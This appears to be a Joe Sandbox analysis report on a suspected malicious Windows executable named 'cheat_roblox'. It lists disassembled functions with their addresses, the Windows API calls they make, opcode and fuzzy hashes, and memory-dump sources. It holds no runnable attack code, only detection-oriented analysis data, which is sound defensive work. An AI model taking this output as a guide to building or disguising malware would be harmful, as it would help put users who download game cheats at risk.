                                                                                                                  • Source File: 00000000.00000002.1339511690.00007FF6E7E11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E7E10000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1339487646.00007FF6E7E10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339558435.00007FF6E7E58000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339586263.00007FF6E7E6B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339586263.00007FF6E7E74000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339809379.00007FF6E7E7A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339809379.00007FF6E7E7E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_7ff6e7e10000_cheat_roblox.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: FileWrite$Handle
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 4209713984-0
                                                                                                                  • Opcode ID: 759593f06e971a5af3dff942057e3884964648b854c35b3f90eb8150d1d2c130
                                                                                                                  • Instruction ID: 07cff67ab990f893a25bdf80773492891e4ada70ef36d7397b7a656c50ed36d9
                                                                                                                  • Opcode Fuzzy Hash: 759593f06e971a5af3dff942057e3884964648b854c35b3f90eb8150d1d2c130
                                                                                                                  • Instruction Fuzzy Hash: 16512623B1968792FA11CB25F80477A2364FF84B94F144131EAADC7A90DF7EE885C746
                                                                                                                  Function 00007FF6E7E403E0 Relevance: 6.1, APIs: 4, Instructions: 123COMMON
                                                                                                                  Download Yara Rule

                                                                                                                  Control-flow Graph

                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1339511690.00007FF6E7E11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E7E10000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1339487646.00007FF6E7E10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339558435.00007FF6E7E58000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339586263.00007FF6E7E6B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339586263.00007FF6E7E74000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339809379.00007FF6E7E7A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339809379.00007FF6E7E7E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_7ff6e7e10000_cheat_roblox.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: _invalid_parameter_noinfo_noreturn$ItemText
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3750147219-0
                                                                                                                  • Opcode ID: 52c617c431d3a38c4c3953567aaae6ca21fa800261db29fbf2d5a33c8d4b5290
                                                                                                                  • Instruction ID: 93da7275b4866a1860d6331a7bb738cf549ec6d907ea6a82a25a0feb56334691
                                                                                                                  • Opcode Fuzzy Hash: 52c617c431d3a38c4c3953567aaae6ca21fa800261db29fbf2d5a33c8d4b5290
                                                                                                                  • Instruction Fuzzy Hash: B4519163F1465284FB009BA5E8453BD2322AF45B94F400235DFBC96BD6EF6ED941C34A
                                                                                                                  Function 00007FF6E7E23684 Relevance: 6.1, APIs: 4, Instructions: 94COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1339511690.00007FF6E7E11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E7E10000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1339487646.00007FF6E7E10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339558435.00007FF6E7E58000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339586263.00007FF6E7E6B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339586263.00007FF6E7E74000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339809379.00007FF6E7E7A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339809379.00007FF6E7E7E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_7ff6e7e10000_cheat_roblox.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: CreateDirectory$ErrorLast_invalid_parameter_noinfo_noreturn
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2359106489-0
                                                                                                                  • Opcode ID: 5cda4ea00785afd89f4b2a0283e369f756aeb3863be6a65230e4b36aaec5c4cf
                                                                                                                  • Instruction ID: 0274ec00d5c159b238cf4dcfbad5218db59d83bc5e26094ec57ed94cefdb34a2
                                                                                                                  • Opcode Fuzzy Hash: 5cda4ea00785afd89f4b2a0283e369f756aeb3863be6a65230e4b36aaec5c4cf
                                                                                                                  • Instruction Fuzzy Hash: FA31C663A1C6C381EA20AB25E44537E6351FF89790F500231EEEDC36D5DF3ED4458A0A
                                                                                                                  Function 00007FF6E7E42D6C Relevance: 6.1, APIs: 4, Instructions: 94COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1339511690.00007FF6E7E11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E7E10000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1339487646.00007FF6E7E10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339558435.00007FF6E7E58000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339586263.00007FF6E7E6B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339586263.00007FF6E7E74000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339809379.00007FF6E7E7A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339809379.00007FF6E7E7E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_7ff6e7e10000_cheat_roblox.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: __scrt_acquire_startup_lock__scrt_dllmain_crt_thread_attach__scrt_get_show_window_mode__scrt_initialize_crt__scrt_release_startup_lock
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1452418845-0
                                                                                                                  • Opcode ID: f380b52e8f95e6a0f24ce785192d8cb773bc143ddf3d62aee805abe4fb8ed354
                                                                                                                  • Instruction ID: 2fe735739b00ed5aeb9165efcd0ab44f72e39f39a4857b25010ab951bc70ce84
                                                                                                                  • Opcode Fuzzy Hash: f380b52e8f95e6a0f24ce785192d8cb773bc143ddf3d62aee805abe4fb8ed354
                                                                                                                  • Instruction Fuzzy Hash: 77313E13E0C10341FA55AB65E4163BD1295AF40344F440434D9EECB6E7EE2FA806A35F
                                                                                                                  Function 00007FF6E7E22320 Relevance: 6.1, APIs: 4, Instructions: 58fileCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1339511690.00007FF6E7E11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E7E10000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1339487646.00007FF6E7E10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339558435.00007FF6E7E58000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339586263.00007FF6E7E6B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339586263.00007FF6E7E74000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339809379.00007FF6E7E7A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339809379.00007FF6E7E7E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_7ff6e7e10000_cheat_roblox.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ErrorLast$FileHandleRead
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2244327787-0
                                                                                                                  • Opcode ID: 5dece825d5be91adec6864fa12bb564f4e3b5809c08bfde6ef0babe01e3581d0
                                                                                                                  • Instruction ID: 431fe34ba4527aeb33ac4a453c845af039fdd424362cdb1a6ccd3be09db31bec
                                                                                                                  • Opcode Fuzzy Hash: 5dece825d5be91adec6864fa12bb564f4e3b5809c08bfde6ef0babe01e3581d0
                                                                                                                  • Instruction Fuzzy Hash: 49216523A0C58781EA605B11F80033D63A8FB45B98F154531DAEDCB684CF7EDC85875A
                                                                                                                  Function 00007FF6E7E2E948 Relevance: 6.0, APIs: 4, Instructions: 31COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00007FF6E7E2ECD8: ResetEvent.KERNEL32 ref: 00007FF6E7E2ECF1
                                                                                                                    • Part of subcall function 00007FF6E7E2ECD8: ReleaseSemaphore.KERNEL32 ref: 00007FF6E7E2ED07
                                                                                                                  • ReleaseSemaphore.KERNEL32 ref: 00007FF6E7E2E974
                                                                                                                  • FindCloseChangeNotification.KERNELBASE ref: 00007FF6E7E2E993
                                                                                                                  • DeleteCriticalSection.KERNEL32 ref: 00007FF6E7E2E9AA
                                                                                                                  • CloseHandle.KERNEL32 ref: 00007FF6E7E2E9B7
                                                                                                                    • Part of subcall function 00007FF6E7E2EA5C: WaitForSingleObject.KERNEL32(?,?,?,?,?,?,?,?,00007FF6E7E2E95F,?,?,?,00007FF6E7E2463A,?,?,?), ref: 00007FF6E7E2EA63
                                                                                                                    • Part of subcall function 00007FF6E7E2EA5C: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00007FF6E7E2E95F,?,?,?,00007FF6E7E2463A,?,?,?), ref: 00007FF6E7E2EA6E
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1339511690.00007FF6E7E11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E7E10000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1339487646.00007FF6E7E10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339558435.00007FF6E7E58000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339586263.00007FF6E7E6B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339586263.00007FF6E7E74000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339809379.00007FF6E7E7A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339809379.00007FF6E7E7E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_7ff6e7e10000_cheat_roblox.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: CloseReleaseSemaphore$ChangeCriticalDeleteErrorEventFindHandleLastNotificationObjectResetSectionSingleWait
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2143293610-0
                                                                                                                  • Opcode ID: 7c4c69b688bb09167c3d8ec6f4195a818a409db0987586a56ae23aa503e7e0cd
                                                                                                                  • Instruction ID: dd655d6334bbde61c1f43ef23d4b939cdf0a5fdcffe627282f0d5d965c84aaf9
                                                                                                                  • Opcode Fuzzy Hash: 7c4c69b688bb09167c3d8ec6f4195a818a409db0987586a56ae23aa503e7e0cd
                                                                                                                  • Instruction Fuzzy Hash: 45012D33A18A9692E648DB21F94536DA370FB84B80F004031DBAD43625CF3EE4B48785
                                                                                                                  Function 00007FF6E7E2EAA4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 42threadCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1339511690.00007FF6E7E11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E7E10000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1339487646.00007FF6E7E10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339558435.00007FF6E7E58000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339586263.00007FF6E7E6B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339586263.00007FF6E7E74000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339809379.00007FF6E7E7A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339809379.00007FF6E7E7E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_7ff6e7e10000_cheat_roblox.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Thread$CreatePriority
                                                                                                                  • String ID: CreateThread failed
                                                                                                                  • API String ID: 2610526550-3849766595
                                                                                                                  • Opcode ID: cf4f3858e1c5421656891f758a667cd72a6f2059ba57d4f8d940dbc9b5e0f540
                                                                                                                  • Instruction ID: ad86f9c08859062e82b696adb975440d7ac3d5462fe5446e251146cb29f41995
                                                                                                                  • Opcode Fuzzy Hash: cf4f3858e1c5421656891f758a667cd72a6f2059ba57d4f8d940dbc9b5e0f540
                                                                                                                  • Instruction Fuzzy Hash: A3119133A08A8381E710DB14F8423BA7360FB84794F548231DAED83669DF3EE585C749
                                                                                                                  Function 00007FF6E7E3946C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 26comCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1339511690.00007FF6E7E11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E7E10000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1339487646.00007FF6E7E10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339558435.00007FF6E7E58000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339586263.00007FF6E7E6B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339586263.00007FF6E7E74000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339809379.00007FF6E7E7A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339809379.00007FF6E7E7E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_7ff6e7e10000_cheat_roblox.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: DirectoryInitializeMallocSystem
                                                                                                                  • String ID: riched20.dll
                                                                                                                  • API String ID: 174490985-3360196438
                                                                                                                  • Opcode ID: 0d85db053d286d1bd0fa19ead2840fc3f5149c6ee0f027e6ed6c33eb2c824e37
                                                                                                                  • Instruction ID: e712193db5ee26c0b6a0973edb4359f8ee64b3b4a6ceea844e74bfc4078a064a
                                                                                                                  • Opcode Fuzzy Hash: 0d85db053d286d1bd0fa19ead2840fc3f5149c6ee0f027e6ed6c33eb2c824e37
                                                                                                                  • Instruction Fuzzy Hash: FFF04F72618A8282EB00DF20F81526EB7A0FB88754F400135EADD86B95DF7DD559CB05
                                                                                                                  Function 00007FF6E7E3095C Relevance: 4.7, APIs: 3, Instructions: 152windowCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00007FF6E7E3853C: GlobalMemoryStatusEx.KERNEL32 ref: 00007FF6E7E3856C
                                                                                                                    • Part of subcall function 00007FF6E7E2AAE0: LoadStringW.USER32 ref: 00007FF6E7E2AB67
                                                                                                                    • Part of subcall function 00007FF6E7E2AAE0: LoadStringW.USER32 ref: 00007FF6E7E2AB80
                                                                                                                    • Part of subcall function 00007FF6E7E11FA0: _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6E7E11FFB
                                                                                                                    • Part of subcall function 00007FF6E7E1129C: Concurrency::cancel_current_task.LIBCPMT ref: 00007FF6E7E11396
                                                                                                                  • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6E7E401BB
                                                                                                                  • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6E7E401C1
                                                                                                                  • SendDlgItemMessageW.USER32 ref: 00007FF6E7E401F2
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1339511690.00007FF6E7E11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E7E10000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1339487646.00007FF6E7E10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339558435.00007FF6E7E58000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339586263.00007FF6E7E6B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339586263.00007FF6E7E74000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339809379.00007FF6E7E7A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339809379.00007FF6E7E7E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_7ff6e7e10000_cheat_roblox.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: _invalid_parameter_noinfo_noreturn$LoadString$Concurrency::cancel_current_taskGlobalItemMemoryMessageSendStatus
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3106221260-0
                                                                                                                  • Opcode ID: f7a8a175be1daf3eca109b687688224756fee905e724f508e14b940bc333b7d5
                                                                                                                  • Instruction ID: 9e44917b0c0c72c89eb608fa1aea19d3a0ce8592ca32bbe2f7159c9c21c8cbd4
                                                                                                                  • Opcode Fuzzy Hash: f7a8a175be1daf3eca109b687688224756fee905e724f508e14b940bc333b7d5
                                                                                                                  • Instruction Fuzzy Hash: 2351C163F0464296FB009BA5E4453FD2322AF89B84F400136DFAD977D6EE2DD901C389
                                                                                                                  Function 00007FF6E7E22134 Relevance: 4.6, APIs: 3, Instructions: 114fileCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1339511690.00007FF6E7E11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E7E10000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1339487646.00007FF6E7E10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339558435.00007FF6E7E58000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339586263.00007FF6E7E6B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339586263.00007FF6E7E74000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339809379.00007FF6E7E7A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339809379.00007FF6E7E7E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_7ff6e7e10000_cheat_roblox.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: CreateFile$_invalid_parameter_noinfo_noreturn
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2272807158-0
                                                                                                                  • Opcode ID: 650906bb36444c59f78769edd7e70a31dc34f49dc41decdeb4024168be9b1e6b
                                                                                                                  • Instruction ID: c3c93378aa4d8fc59937e5e4a73604ab2e48d61b0fbc9ecd17fb3b2f54bf5d42
                                                                                                                  • Opcode Fuzzy Hash: 650906bb36444c59f78769edd7e70a31dc34f49dc41decdeb4024168be9b1e6b
                                                                                                                  • Instruction Fuzzy Hash: F641AF73A1868682EA208B15F84476963A5FB84BA4F105334DFFD47AD5CF3EE8918609
                                                                                                                  Function 00007FF6E7E123F8 Relevance: 4.6, APIs: 3, Instructions: 73COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1339511690.00007FF6E7E11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E7E10000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1339487646.00007FF6E7E10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339558435.00007FF6E7E58000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339586263.00007FF6E7E6B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339586263.00007FF6E7E74000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339809379.00007FF6E7E7A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339809379.00007FF6E7E7E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_7ff6e7e10000_cheat_roblox.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: TextWindow$Length_invalid_parameter_noinfo_noreturn
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2176759853-0
                                                                                                                  • Opcode ID: 1bf85210b9a87779fb11811f9a7e2f8ba75c636e64e4f9da94f36f1c7ff0fb34
                                                                                                                  • Instruction ID: d64bfbbbc499c53140e7617979ec548c39451acfb83d7e548fab6a2d2d3c6eb5
                                                                                                                  • Opcode Fuzzy Hash: 1bf85210b9a87779fb11811f9a7e2f8ba75c636e64e4f9da94f36f1c7ff0fb34
                                                                                                                  • Instruction Fuzzy Hash: 0B21BF73A28B8681EA108B69F84027EA364FB89BD0F144235EBED43B95DF3DD181C745
                                                                                                                  Function 00007FF6E7E31F94 Relevance: 4.6, APIs: 3, Instructions: 68COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1339511690.00007FF6E7E11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E7E10000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1339487646.00007FF6E7E10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339558435.00007FF6E7E58000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339586263.00007FF6E7E6B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339586263.00007FF6E7E74000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339809379.00007FF6E7E7A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339809379.00007FF6E7E7E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_7ff6e7e10000_cheat_roblox.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: std::bad_alloc::bad_alloc
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1875163511-0
                                                                                                                  • Opcode ID: 0ac8b931c67533783bb99e44ed512301af0920adb1b65b15738df05c1e7b1342
                                                                                                                  • Instruction ID: 52223ed88e8c2a88da8c584773a87753451864bbf44efaa80ac70025a8e1ba5b
                                                                                                                  • Opcode Fuzzy Hash: 0ac8b931c67533783bb99e44ed512301af0920adb1b65b15738df05c1e7b1342
                                                                                                                  • Instruction Fuzzy Hash: 0C31B723A0CA86A1FB249714E4483BD63A4FB40788F544431D2EC8A5B9DF7EDA56C70B
                                                                                                                  Function 00007FF6E7E23D34 Relevance: 4.6, APIs: 3, Instructions: 62COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1339511690.00007FF6E7E11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E7E10000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1339487646.00007FF6E7E10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339558435.00007FF6E7E58000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339586263.00007FF6E7E6B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339586263.00007FF6E7E74000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339809379.00007FF6E7E7A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339809379.00007FF6E7E7E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_7ff6e7e10000_cheat_roblox.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: AttributesFile$_invalid_parameter_noinfo_noreturn
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1203560049-0
                                                                                                                  • Opcode ID: 30421b436104fcb90b4cd2208b99a3bf3782908f0837f7a91d3eb4cb73bf7196
                                                                                                                  • Instruction ID: 1c0f36e3dea45f825418d746a5f6777e5e3ed92d2395004e461f546845a8b51e
                                                                                                                  • Opcode Fuzzy Hash: 30421b436104fcb90b4cd2208b99a3bf3782908f0837f7a91d3eb4cb73bf7196
                                                                                                                  • Instruction Fuzzy Hash: A221C833A187C681EA208B25F44536E6361FF88B98F105230EBEE87695EF3DD545CA49
                                                                                                                  Function 00007FF6E7E231BC Relevance: 4.6, APIs: 3, Instructions: 59fileCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1339511690.00007FF6E7E11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E7E10000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1339487646.00007FF6E7E10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339558435.00007FF6E7E58000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339586263.00007FF6E7E6B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339586263.00007FF6E7E74000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339809379.00007FF6E7E7A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1339809379.00007FF6E7E7E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_7ff6e7e10000_cheat_roblox.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: DeleteFile$_invalid_parameter_noinfo_noreturn
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3118131910-0
                                                                                                                  • Opcode ID: 539e2a0488ada646b9a4eb5c90a9f278ffd13936dc8dbc7caf4118334a65d282
                                                                                                                  • Instruction ID: 1487825dd1cf765cddbf156db568795e4c67d2b374940812ebe6ddf9f79a996f
                                                                                                                  • Opcode Fuzzy Hash: 539e2a0488ada646b9a4eb5c90a9f278ffd13936dc8dbc7caf4118334a65d282
                                                                                                                  • Instruction Fuzzy Hash: E3217123A1878681EA108B25F44536E6360FB88B94F501231EBEE87A99DF2DD541CB49
                                                                                                                  Function 00007FF6E7E232BC Relevance: 4.6, APIs: 3, Instructions: 57COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1339511690.00007FF6E7E11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E7E10000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1339487646.00007FF6E7E10000.00000002.00000001.01000000.00000003.sdmpDownload File
